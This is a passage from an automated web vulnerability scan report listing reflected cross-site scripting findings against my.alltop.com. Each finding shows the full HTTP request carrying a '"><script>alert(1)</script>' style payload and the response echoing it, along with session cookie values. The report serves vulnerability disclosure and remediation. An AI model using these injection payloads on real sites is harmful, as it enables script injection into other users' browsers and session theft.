Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%22ns=%22netsparker(0x000191)?53d96"><script>alert(1)</script>645dacf2bc=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.129. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c61a"><script>alert(1)</script>6b3fbe1bdcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g7c61a"><script>alert(1)</script>6b3fbe1bdcf/%2522ns%253D%2522netsparker%25280x000197%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:27 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:29 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:29 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g7c61a"><script>alert(1)</script>6b3fbe1bdcf/%2522ns%253D%2522netsparker%25280x000197%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.130. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 876d2"><script>alert(1)</script>f65e190f11c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)876d2"><script>alert(1)</script>f65e190f11c HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)876d2"><script>alert(1)</script>f65e190f11c" method="post" accept-charset="utf-8">
...[SNIP]...

1.131. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e214"><script>alert(1)</script>14d0a0fe06d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)?5e214"><script>alert(1)</script>14d0a0fe06d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)?5e214"><script>alert(1)</script>14d0a0fe06d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.132. http://my.alltop.com/alpha/h ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001C2)</script> request parameter is copied into the HTML document as plain text between tags. The payload 36b86<script>alert(1)</script>1af0142b44e was submitted in the '"--></style></script><script>netsparker(0x0001C2)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?'"--></style></script><script>netsparker(0x0001C2)</script>36b86<script>alert(1)</script>1af0142b44e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>36b86<script>alert(1)</script>1af0142b44e" method="post" accept-charset="utf-8">
...[SNIP]...

1.133. http://my.alltop.com/alpha/h [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a2"><script>alert(1)</script>e713231d700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ha71a2"><script>alert(1)</script>e713231d700 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ha71a2"><script>alert(1)</script>e713231d700" method="post" accept-charset="utf-8">
...[SNIP]...

1.134. http://my.alltop.com/alpha/h [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a799c"><script>alert(1)</script>ba97f7fba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?a799c"><script>alert(1)</script>ba97f7fba3=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h?a799c"><script>alert(1)</script>ba97f7fba3=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.135. http://my.alltop.com/alpha/h [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c76"><script>alert(1)</script>e2680cd3844 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3Eb0c76"><script>alert(1)</script>e2680cd3844 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3Eb0c76"><script>alert(1)</script>e2680cd3844" method="post" accept-charset="utf-8">
...[SNIP]...

1.136. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac43"><script>alert(1)</script>f6cacb4a969 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3Cbac43"><script>alert(1)</script>f6cacb4a969/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3Cbac43"><script>alert(1)</script>f6cacb4a969/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

